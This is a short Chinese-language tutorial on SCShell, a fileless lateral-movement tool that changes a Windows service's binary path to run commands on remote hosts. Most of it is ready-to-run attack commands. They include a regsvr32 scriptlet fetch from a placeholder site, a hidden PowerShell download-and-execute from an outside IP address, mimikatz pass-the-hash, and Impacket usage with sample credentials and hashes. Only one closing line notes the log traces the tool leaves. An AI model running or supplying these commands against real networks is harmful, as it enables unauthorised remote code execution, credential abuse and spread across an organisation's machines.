1、简介
SCShell是无文件横向移动工具,它依赖ChangeServiceConfigA来运行命令。该工具的优点在于它不会针对SMB执行身份验证。一切都通过DCERPC执行。无需创建服务,而只需通过ChangeServiceConfigAAPI 远程打开服务并修改二进制路径名即可(所以要事先知道目标上的服务名称)。支持py和exe两种文件类型。
2、使用
Windows 使用
SCShell.exe target service payload domain username password
SCShell.exe 192.168.197.131 XblAuthManager "C:windowssystem32cmd.exe /c C:windowssystem32
egsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrastor Password # XblAuthManager 是 Xbox Accessory Management Service的服务名
测试写入文件
scshell.exe 192.168.152.148 defragsvc "C:windowssystem32cmd.exe /c echo ' hello' > c:windows emphello.txt" . administrator admin@123
CSshell横向利用powershell上线
scshell.exe 192.168.152.148 defragsvc "C:windowssystem32cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://182.1.1.156:8000/a')" . administrator admin@123
可以使用该C程序传递哈希值。
有时情况下,将使用当前进程令牌。您可以使用标准传递哈希方法设置当前流程令牌。
在本地系统上
sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe
然后在新创建的cmd.exe中运行SCShell.exe进行横向。
上面我们使用的是XblAuthManager,其实我们还可以使用defragsvc,msbuild等等
2. Linux 安装使用
pip install impacket
git clone https://github.com/Mr-Un1k0d3r/SCShell
cd https://github.com/Mr-Un1k0d3r/SCShell
python scshell.py ./administrator:cxzcxz@192.168.52.133 # 执行cmd模式,没有命令回显
python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce # hash验证
3、日志痕迹
使用用户凭证连接会在目标日志系统留下用户名、来访机器IP和服务超时等信息
